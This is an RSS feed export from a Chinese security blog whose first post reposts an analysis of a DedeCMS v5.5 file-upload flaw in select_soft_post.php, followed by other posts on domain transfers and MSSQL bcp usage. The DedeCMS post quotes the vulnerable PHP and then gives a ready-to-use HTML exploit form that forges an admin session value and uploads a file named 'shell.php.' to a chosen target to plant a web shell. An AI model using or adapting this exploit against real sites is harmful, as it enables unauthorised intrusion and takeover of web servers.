<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>lixiaopeng&#039;s blog</title>
	<atom:link href="http://www.lixiaopeng.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.lixiaopeng.org</link>
	<description>这个世界好YD!</description>
	<lastBuildDate>Mon, 08 Mar 2010 17:27:20 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>DEDECMS v5.5 Final select_soft_post.php 漏洞</title>
		<link>http://www.lixiaopeng.org/dedecms-v5-5-final-select_soft_post-php-vulnerability/</link>
		<comments>http://www.lixiaopeng.org/dedecms-v5-5-final-select_soft_post-php-vulnerability/#comments</comments>
		<pubDate>Mon, 08 Mar 2010 17:26:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[入侵]]></category>
		<category><![CDATA[dedecms]]></category>
		<category><![CDATA[DEDECMS V5.5]]></category>
		<category><![CDATA[SELECT_SOFT_POST.PHP]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/?p=1354</guid>
		<description><![CDATA[作者:st0p
转载请注明出处 http://www.st0p.org
今天才从Wolves Security Team看到toby57大牛发布的"DEDECMS v5.5 GBK Final 的一个鸡肋漏洞"这篇文章,原文地址:http://bbs.wolvez.org/topic/125/
自己本地测试了一下,覆盖SESSION这个有点鸡胁才是真的,因为要求session.auto_start = 1的情况下,一般session.auto_start这个是关闭的,所以很鸡胁.不过后面的拿SHELL当你成功进入后台的情况下就能用了..
而且session.auto_start一般是要和session_start()一起用的.查了一下资料,只有在session.auto_start开启的情况下,先调用session_start(),然后才有可能.不过具体杂覆盖的SESSION我还没去看,唉,要真找下去头非晕不可...有空在看吧..
我看了一下,其实GBK和UTF8都存在这个问题,不知道发现这个的大牛为啥只是把标题写了GBK...
看了一下/include/dialog/select_soft_post.php
问题主要出现在手工指定文件名后,更名的部分.当我们的名字为st0p.php.的时候,注意,php后还有个点,就可以跳过验证,看代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
......
//文件名（前为手工指定， 后者自动处理）
if&#40;!empty&#40;$newname&#41;&#41;
&#123;
	$filename = $newname; //当我们的新名称为st0p.php.的时候
	if&#40;!ereg&#40;&#34;\.&#34;, $filename&#41;&#41; $fs = explode&#40;'.', $uploadfile_name&#41;; //当$filename中不含有.的时候调用
	else $fs = explode&#40;'.', $filename&#41;; //当$filename中含有.时调用
	if&#40;eregi&#40;$cfg_not_allowall, $fs&#91;count&#40;$fs&#41;-1&#93;&#41;&#41; //$fs[count($fs)-1]得到的值为空,跳过验证
	&#123;
		ShowMsg&#40;&#34;你指定的文件名被系统禁止！&#34;,'javascript:;'&#41;;
		exit&#40;&#41;;
	&#125;
	if&#40;!ereg&#40;&#34;\.&#34;, $filename&#41;&#41; $filename = $filename.'.'.$fs&#91;count&#40;$fs&#41;-1&#93;;
&#125;
else
&#123;
	$filename = $cuserLogin-&#62;getUserID&#40;&#41;.'-'.dd2char&#40;MyDate&#40;'ymdHis',$nowtme&#41;&#41;;
	$fs = explode&#40;'.', $uploadfile_name&#41;;
	if&#40;eregi&#40;$cfg_not_allowall, $fs&#91;count&#40;$fs&#41;-1&#93;&#41;&#41;
	&#123;
		ShowMsg&#40;&#34;你上传了某些可能存在不安全因素的文件，系统拒绝操作！&#34;,'javascript:;'&#41;;
		exit&#40;&#41;;
	&#125;
	$filename = $filename.'.'.$fs&#91;count&#40;$fs&#41;-1&#93;;
&#125;
$fullfilename = $cfg_basedir.$activepath.'/'.$filename; //嘿嘿,跳过验证,$filename还为st0p.php.
$fullfileurl = $activepath.'/'.$filename;
move_uploaded_file&#40;$uploadfile,$fullfilename&#41; or die&#40;&#34;上传文件到 $fullfilename 失败！&#34;&#41;;
@unlink&#40;$uploadfile&#41;;
......

EXP如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
&#60;!DOCTYPE html PUBLIC &#34;-//W3C//DTD XHTML 1.0 Transitional//EN&#34; &#34;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&#34;&#62;
&#60;html [...]]]></description>
			<content:encoded><![CDATA[<p>作者:st0p<br />
转载请注明出处 http://www.st0p.org</p>
<p>今天才从Wolves Security Team看到toby57大牛发布的"DEDECMS v5.5 GBK Final 的一个鸡肋漏洞"这篇文章,原文地址:<a href="http://bbs.wolvez.org/topic/125/" target="_blank">http://bbs.wolvez.org/topic/125/</a></p>
<p>自己本地测试了一下,覆盖SESSION这个有点鸡胁才是真的,因为要求session.auto_start = 1的情况下,一般session.auto_start这个是关闭的,所以很鸡胁.不过后面的拿SHELL当你成功进入后台的情况下就能用了..</p>
<p>而且session.auto_start一般是要和session_start()一起用的.查了一下资料,只有在session.auto_start开启的情况下,先调用session_start(),然后才有可能.不过具体杂覆盖的SESSION我还没去看,唉,要真找下去头非晕不可...有空在看吧..</p>
<p>我看了一下,其实GBK和UTF8都存在这个问题,不知道发现这个的大牛为啥只是把标题写了GBK...</p>
<p>看了一下/include/dialog/select_soft_post.php</p>
<p>问题主要出现在手工指定文件名后,更名的部分.当我们的名字为st0p.php.的时候,注意,php后还有个点,就可以跳过验证,看代码</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">......</span>
<span style="color: #666666; font-style: italic;">//文件名（前为手工指定， 后者自动处理）</span>
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #990000;">empty</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$newname</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span>
<span style="color: #009900;">&#123;</span>
	<span style="color: #000088;">$filename</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$newname</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//当我们的新名称为st0p.php.的时候</span>
	<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #990000;">ereg</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;\.&quot;</span><span style="color: #339933;">,</span> <span style="color: #000088;">$filename</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #000088;">$fs</span> <span style="color: #339933;">=</span> <span style="color: #990000;">explode</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'.'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$uploadfile_name</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//当$filename中不含有.的时候调用</span>
	<span style="color: #b1b100;">else</span> <span style="color: #000088;">$fs</span> <span style="color: #339933;">=</span> <span style="color: #990000;">explode</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'.'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$filename</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//当$filename中含有.时调用</span>
	<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">eregi</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cfg_not_allowall</span><span style="color: #339933;">,</span> <span style="color: #000088;">$fs</span><span style="color: #009900;">&#91;</span><span style="color: #990000;">count</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$fs</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">-</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #666666; font-style: italic;">//$fs[count($fs)-1]得到的值为空,跳过验证</span>
	<span style="color: #009900;">&#123;</span>
		ShowMsg<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;你指定的文件名被系统禁止！&quot;</span><span style="color: #339933;">,</span><span style="color: #0000ff;">'javascript:;'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
		<span style="color: #990000;">exit</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #009900;">&#125;</span>
	<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #990000;">ereg</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;\.&quot;</span><span style="color: #339933;">,</span> <span style="color: #000088;">$filename</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #000088;">$filename</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$filename</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'.'</span><span style="color: #339933;">.</span><span style="color: #000088;">$fs</span><span style="color: #009900;">&#91;</span><span style="color: #990000;">count</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$fs</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">-</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">else</span>
<span style="color: #009900;">&#123;</span>
	<span style="color: #000088;">$filename</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$cuserLogin</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">getUserID</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'-'</span><span style="color: #339933;">.</span>dd2char<span style="color: #009900;">&#40;</span>MyDate<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'ymdHis'</span><span style="color: #339933;">,</span><span style="color: #000088;">$nowtme</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #000088;">$fs</span> <span style="color: #339933;">=</span> <span style="color: #990000;">explode</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'.'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$uploadfile_name</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">eregi</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cfg_not_allowall</span><span style="color: #339933;">,</span> <span style="color: #000088;">$fs</span><span style="color: #009900;">&#91;</span><span style="color: #990000;">count</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$fs</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">-</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span>
	<span style="color: #009900;">&#123;</span>
		ShowMsg<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;你上传了某些可能存在不安全因素的文件，系统拒绝操作！&quot;</span><span style="color: #339933;">,</span><span style="color: #0000ff;">'javascript:;'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
		<span style="color: #990000;">exit</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #009900;">&#125;</span>
	<span style="color: #000088;">$filename</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$filename</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'.'</span><span style="color: #339933;">.</span><span style="color: #000088;">$fs</span><span style="color: #009900;">&#91;</span><span style="color: #990000;">count</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$fs</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">-</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #000088;">$fullfilename</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$cfg_basedir</span><span style="color: #339933;">.</span><span style="color: #000088;">$activepath</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'/'</span><span style="color: #339933;">.</span><span style="color: #000088;">$filename</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//嘿嘿,跳过验证,$filename还为st0p.php.</span>
<span style="color: #000088;">$fullfileurl</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$activepath</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'/'</span><span style="color: #339933;">.</span><span style="color: #000088;">$filename</span><span style="color: #339933;">;</span>
<span style="color: #990000;">move_uploaded_file</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$uploadfile</span><span style="color: #339933;">,</span><span style="color: #000088;">$fullfilename</span><span style="color: #009900;">&#41;</span> or <span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;上传文件到 <span style="color: #006699; font-weight: bold;">$fullfilename</span> 失败！&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #339933;">@</span><span style="color: #990000;">unlink</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$uploadfile</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #339933;">......</span></pre></td></tr></table></div>

<p>EXP如下</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
</pre></td><td class="code"><pre class="html" style="font-family:monospace;">&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;DEDECMS v5.5 Final select_soft_post.php EXP&lt;/title&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
function fsubmit(){
    var form = document.forms[0];
    form.action = form.target.value + form.path.value;
    tmpstr = form.target.value +'/'+ form.newname.value;
    form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
    form.submit();
    }
&lt;/script&gt;
&lt;style type=&quot;text/css&quot;&gt;
&lt;!--
body {
	text-align: center;
}
--&gt;
&lt;/style&gt;
&lt;/head&gt;
&nbsp;
&lt;body&gt;
&lt;h3&gt;DEDECMS v5.5 Final select_soft_post.php EXP&lt;/h3&gt;
&lt;form action=&quot;&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;
  &lt;p&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;_SESSION[dede_admin_id]&quot; value=&quot;1&quot; /&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;bkurl&quot; value=&quot;1&quot; /&gt;
    &lt;label&gt;Target:
      &lt;input name=&quot;target&quot; type=&quot;text&quot; id=&quot;target&quot; value=&quot;http://target&quot; /&gt;
    &lt;/label&gt;
    &lt;label&gt;Path:
      &lt;input name=&quot;path&quot; type=&quot;text&quot; id=&quot;path&quot; value=&quot;/include/dialog/select_soft_post.php&quot; /&gt;
    &lt;/label&gt;
    &lt;label&gt;File:
      &lt;input type=&quot;file&quot; name=&quot;uploadfile&quot; id=&quot;uploadfile&quot; /&gt;
    &lt;/label&gt;
    &lt;label&gt;NewName:
      &lt;input name=&quot;newname&quot; type=&quot;text&quot; id=&quot;newname&quot; value=&quot;shell.php.&quot; /&gt;
    &lt;/label&gt;
    &amp;nbsp;&lt;input type=&quot;submit&quot; name=&quot;button&quot; id=&quot;button&quot; value=&quot;Fuck&quot; onclick=&quot;fsubmit()&quot; /&gt;
  &lt;/p&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre></td></tr></table></div>

<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li><a href="http://www.lixiaopeng.org/sablog-x-v2-x-arbitrary-variable-overwrite-vulnerability/" title="Sablog-X v2.x 任意变量覆盖漏洞">Sablog-X v2.x 任意变量覆盖漏洞</a></li><li><a href="http://www.lixiaopeng.org/dedecms-fiction-serial-module-0day/" title="DEDECMS 小说连载模块 0DAY">DEDECMS 小说连载模块 0DAY</a></li><li><a href="http://www.lixiaopeng.org/dvbbs-php2-0-injection-vulnerability/" title="DVBBS php2.0 注入漏洞">DVBBS php2.0 注入漏洞</a></li><li><a href="http://www.lixiaopeng.org/linux-kernel-high-risk-vulnerability-a-command-directly-to-the-right/" title="Linux内核高危漏洞,一个命令直接提权">Linux内核高危漏洞,一个命令直接提权</a></li><li><a href="http://www.lixiaopeng.org/dedecms-xday/" title="DEDECMS XDAY">DEDECMS XDAY</a></li><li><a href="http://www.lixiaopeng.org/ewebeditor-v6-0-0-version-of-the-loopholes/" title="ewebeditor v6.0.0版本漏洞">ewebeditor v6.0.0版本漏洞</a></li><li><a href="http://www.lixiaopeng.org/dedecms-53-inadequacies-chicken-plus-one-small-leak/" title="dedecms 5.3的不足之处,加一鸡肋小漏!">dedecms 5.3的不足之处,加一鸡肋小漏!</a></li><li><a href="http://www.lixiaopeng.org/two-loopholes-joekoe-cms-40-from-the-loopholes-injection/" title="joekoe CMS 4.0 两个漏洞(上传漏洞+注入)">joekoe CMS 4.0 两个漏洞(上传漏洞+注入)</a></li><li><a href="http://www.lixiaopeng.org/mall-ecshop-system-filters-lead-to-sql-injection-vulnerabilities-lax/" title="ECSHOP商城系统过滤不严导致SQL注入漏洞">ECSHOP商城系统过滤不严导致SQL注入漏洞</a></li><li><a href="http://www.lixiaopeng.org/dvbbs-showasp-strict-filtering-page-lead-to-cross-site-flaws/" title="动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞">动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/dedecms-v5-5-final-select_soft_post-php-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>域名转移注册商最快最有效的方法!新网,新网互联,万网适用!</title>
		<link>http://www.lixiaopeng.org/domain-transfer-registrar-fastest-and-most-effective-way-a-new-network-xinwanghulian-10000-web-application/</link>
		<comments>http://www.lixiaopeng.org/domain-transfer-registrar-fastest-and-most-effective-way-a-new-network-xinwanghulian-10000-web-application/#comments</comments>
		<pubDate>Fri, 26 Feb 2010 05:02:25 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[其它]]></category>
		<category><![CDATA[万网适用]]></category>
		<category><![CDATA[域名]]></category>
		<category><![CDATA[新网]]></category>
		<category><![CDATA[新网互联]]></category>
		<category><![CDATA[注册商]]></category>
		<category><![CDATA[转移]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/?p=1352</guid>
		<description><![CDATA[来源：http://www.52crack.com/blog/?action=show&#038;id=487
根本不需要什么身份证明,乱七八糟证明的,你只需确认whois信息里admin的邮箱是你所有的,就OK.
一下内容都建立在这个前提下,否则出现其他后果,自负!
最好用的办法就是到InterNIC 递交你的投诉,地址http://reports.internic.net/cgi/registrars/problem-report.cgi
在这里你只需要填写一下个人信息,还有下面的单选框,选右下角那一个.
Transfer Problems -
Auth Codes
Locked Domain
Fraudulent Transfer
Registrar Denied Transfer
作为消费者的我们一定要勇于维护自己的权益，而不是忍气吞声，这样子只会助纣为虐，让坏人更加嚣张。对于中国的某些域名注册商和代理们我也不用多说了，如果你曾经在转移域名的问题受到过他们的刁难，请一定要到上面这个地址去投诉下他们。
万网:HICHINA ZHICHENG TECHNOLOGY LTD.
新网互联:BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
新网信海:XIN NET TECHNOLOGY CORPORATION
PS:新网信海还算是不错的,我给代理发了邮件,3工作日后,就收到域名转移码了.所以说注册域名找个好代理也很重要.
范文1
Hello,I regesiter xxxx.com and xxxx.com from HICHINA ZHICHENG TECHNOLOGY LTD.
I am not satisfied with their services.And I want to transfer my domains to name.com.
From April 20th,2009,I have do everything as they tell me to do.I [...]]]></description>
			<content:encoded><![CDATA[<p>来源：http://www.52crack.com/blog/?action=show&#038;id=487</p>
<p>根本不需要什么身份证明,乱七八糟证明的,你只需确认whois信息里admin的邮箱是你所有的,就OK.</p>
<p>一下内容都建立在这个前提下,否则出现其他后果,自负!</p>
<p>最好用的办法就是到InterNIC 递交你的投诉,地址http://reports.internic.net/cgi/registrars/problem-report.cgi</p>
<p>在这里你只需要填写一下个人信息,还有下面的单选框,选右下角那一个.</p>
<p>Transfer Problems -<br />
Auth Codes<br />
Locked Domain<br />
Fraudulent Transfer<br />
Registrar Denied Transfer</p>
<p>作为消费者的我们一定要勇于维护自己的权益，而不是忍气吞声，这样子只会助纣为虐，让坏人更加嚣张。对于中国的某些域名注册商和代理们我也不用多说了，如果你曾经在转移域名的问题受到过他们的刁难，请一定要到上面这个地址去投诉下他们。</p>
<p>万网:HICHINA ZHICHENG TECHNOLOGY LTD.</p>
<p>新网互联:BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN</p>
<p>新网信海:XIN NET TECHNOLOGY CORPORATION</p>
<p>PS:新网信海还算是不错的,我给代理发了邮件,3工作日后,就收到域名转移码了.所以说注册域名找个好代理也很重要.</p>
<p>范文1<br />
Hello,I regesiter xxxx.com and xxxx.com from HICHINA ZHICHENG TECHNOLOGY LTD.<br />
I am not satisfied with their services.And I want to transfer my domains to name.com.<br />
From April 20th,2009,I have do everything as they tell me to do.I have send my goverment ID card copy to them.<br />
And I have given a lot of phones to them.Everytime they say I will receive my auth code soon.But everytime I login in my email-”xxxx@xxxx.com”,I still couldn’t receive the auth codes.<br />
They limited the user transfer the domain particularly seriously.I have waste about one mothes but I still can’t receive my auth code.<br />
Today they want me to wait for 60 days and continu to begin the transfer again.<br />
They don’t give me the auth codes to transfer the domain.Please!Please!Do please help me tarnsfer my domain.HICHINA is a very bad domain registrar.</p>
<p>范文2<br />
This is a Domain Name Complaint letter about HiChina Registrar I send 3nd times. I’m the domain owner of xxxxxx, wanna transfer domains registrar from HiChina (HiChina Zhicheng Technology Limited, www.net.cn) to GoDaddy.com, Inc.</p>
<p>But after I submit information include photocopy of id card &#038; passport and comfirm they recieved (by telephone). HICHINA refuse to processed the transfer, the reason is the application form is not completely. Actually I submit 2 times to meet their request.</p>
<p>First time: Around 23rd, Dec 2008 I sent application form and photocopy of my ID card. They replay me that there is a reqest item i left empty and no signature;</p>
<p>Second time: Around 8th, Feb 2009 I sent application form with signature and completely all item attached photocopy of my passport (by HiChina’s request). But they still refuse with same reason. I don’t know how can I do to meet the request.</p>
<p>I feel that is irresponsible action and it break the iccan domain policy for nosense reason. I need your help.</p>
<p>范文3<br />
To Iccan administrator:<br />
Dear ICCAN administrator,happy new year.<br />
This is a Domain Name Complaint letter about Changing Registrars,I’m the domain owner, wanna tranfer some domain Registrar from HICHINA WEB SOLUTIONS (HONG KONG) LIMITED to enom<br />
(xxx.com，xx.net，xx.com，xx.com，xxxx.com…)<br />
But after i submit ems info to them and confirm they receving(by email and telephone),HICHINA refuse to proceed the process and then have no response.<br />
I feel that’s irresponsible action and it break the iccan domain Policy for nonsense reason.I need your help.<br />
my agent id:xxx,name xxx,thanks a lot.<br />
server info:<br />
Domain Name: xxx<br />
Registrar: HICHINA WEB SOLUTIONS (HONG KONG) LIMITED<br />
Whois Server: grs.hichina.com<br />
Referral URL: http://whois.hichina.com</p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li><a href="http://www.lixiaopeng.org/the-new-dns-server-network-hacking/" title="新网DNS服务器被黑客攻击">新网DNS服务器被黑客攻击</a></li><li><a href="http://www.lixiaopeng.org/lixiaopengorg-apply-to-transfer-to-the-godaddy/" title="lixiaopeng.org申请转入GODADDY了">lixiaopeng.org申请转入GODADDY了</a></li><li><a href="http://www.lixiaopeng.org/are-some-people-to-buy-my-lixiaopengorg-domain/" title="难道有人要买我的lixiaopeng.org域名？">难道有人要买我的lixiaopeng.org域名？</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/domain-transfer-registrar-fastest-and-most-effective-way-a-new-network-xinwanghulian-10000-web-application/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>MSSQL bcp用法</title>
		<link>http://www.lixiaopeng.org/mssql-bcp-usage/</link>
		<comments>http://www.lixiaopeng.org/mssql-bcp-usage/#comments</comments>
		<pubDate>Sun, 21 Feb 2010 10:00:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[SQL]]></category>
		<category><![CDATA[bcp]]></category>
		<category><![CDATA[bcp.exe]]></category>
		<category><![CDATA[mssql]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/?p=1350</guid>
		<description><![CDATA[通过SQL语句导出数据

1
2
bcp &#34;select * from info..info where date between '2010-02-01' and
'2010-02-04'&#34; queryout &#34;d:\info.out&#34; -SST0P-PC\SQLEXPRESS -Usa -P123456 -c

直接导出数据库表的数据

1
bcp 库名.dbo.表名 out d:\表名.dat -T -n

其中-S后的ST0P-PC\SQLEXPRESS是我本地的服务器名称
-U后的是用户名
-p后的是密码
输入bcp/?查看帮助
用法: bcp {dbtable &#124; query} {in &#124; out &#124; queryout &#124; format} 数据文件
  [-m 最大错误数]             [-f 格式化文件]      [...]]]></description>
			<content:encoded><![CDATA[<p>通过SQL语句导出数据</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
</pre></td><td class="code"><pre class="sql" style="font-family:monospace;">bcp <span style="color: #ff0000;">&quot;select * from info..info where date between '2010-02-01' and
'2010-02-04'&quot;</span> queryout <span style="color: #ff0000;">&quot;d:<span style="color: #000099; font-weight: bold;">\i</span>nfo.out&quot;</span> <span style="color: #66cc66;">-</span>SST0P<span style="color: #66cc66;">-</span>PC\SQLEXPRESS <span style="color: #66cc66;">-</span>Usa <span style="color: #66cc66;">-</span>P123456 <span style="color: #66cc66;">-</span>c</pre></td></tr></table></div>

<p>直接导出数据库表的数据</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="sql" style="font-family:monospace;">bcp 库名<span style="color: #66cc66;">.</span>dbo<span style="color: #66cc66;">.</span>表名 out d:\表名<span style="color: #66cc66;">.</span>dat <span style="color: #66cc66;">-</span>T <span style="color: #66cc66;">-</span>n</pre></td></tr></table></div>

<p>其中-S后的ST0P-PC\SQLEXPRESS是我本地的服务器名称<br />
-U后的是用户名<br />
-p后的是密码</p>
<p>输入bcp/?查看帮助</p>
<p>用法: bcp {dbtable | query} {in | out | queryout | format} 数据文件<br />
  [-m 最大错误数]             [-f 格式化文件]         [-e 错误文件]<br />
  [-F 首行]                   [-L 末行]             [-b 批大小]<br />
  [-n 本机类型]               [-c 字符类型]         [-w 宽字符类型]<br />
  [-N 将非文本保持为本机类型] [-V 文件格式版本]     [-q 带引号的标识符]<br />
  [-C 代码页说明符]           [-t 字段终止符]       [-r 行终止符]<br />
  [-i 输入文件]               [-o 输出文件]         [-a 数据包大小]<br />
  [-S 服务器名称]             [-U 用户名]           [-P 密码]<br />
  [-T 可信连接]               [-v 版本]             [-R 允许使用区域设置]<br />
  [-k 保留空值]               [-E 保留标识值]<br />
  [-h"加载提示"]              [-x 生成 xml 格式化文件]</p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li><a href="http://www.lixiaopeng.org/to-mssql-command-of-sa-privileges-methods/" title="[转]mssql的sa权限执行命令方法总结">[转]mssql的sa权限执行命令方法总结</a></li><li><a href="http://www.lixiaopeng.org/mssql-pass-into-the-killing-as-long-as-there-is-into-the-points-system-privileges/" title="MSSQL注入通杀，只要有注入点就有系统权限">MSSQL注入通杀，只要有注入点就有系统权限</a></li><li><a href="http://www.lixiaopeng.org/mssql-injection-of-union-access-to-data-in-a-number-of-studies/" title="对mssql注射中union获取数据的一些研究">对mssql注射中union获取数据的一些研究</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/mssql-bcp-usage/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Sablog-X v2.x 任意变量覆盖漏洞</title>
		<link>http://www.lixiaopeng.org/sablog-x-v2-x-arbitrary-variable-overwrite-vulnerability/</link>
		<comments>http://www.lixiaopeng.org/sablog-x-v2-x-arbitrary-variable-overwrite-vulnerability/#comments</comments>
		<pubDate>Fri, 19 Feb 2010 00:06:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[入侵]]></category>
		<category><![CDATA[$_EVO]]></category>
		<category><![CDATA[extract()]]></category>
		<category><![CDATA[Sablog-X]]></category>
		<category><![CDATA[Sablog-X v2.x]]></category>
		<category><![CDATA[变量覆盖]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.lixiaopeng.org/sablog-x-v2-x-arbitrary-variable-overwrite-vulnerability/</guid>
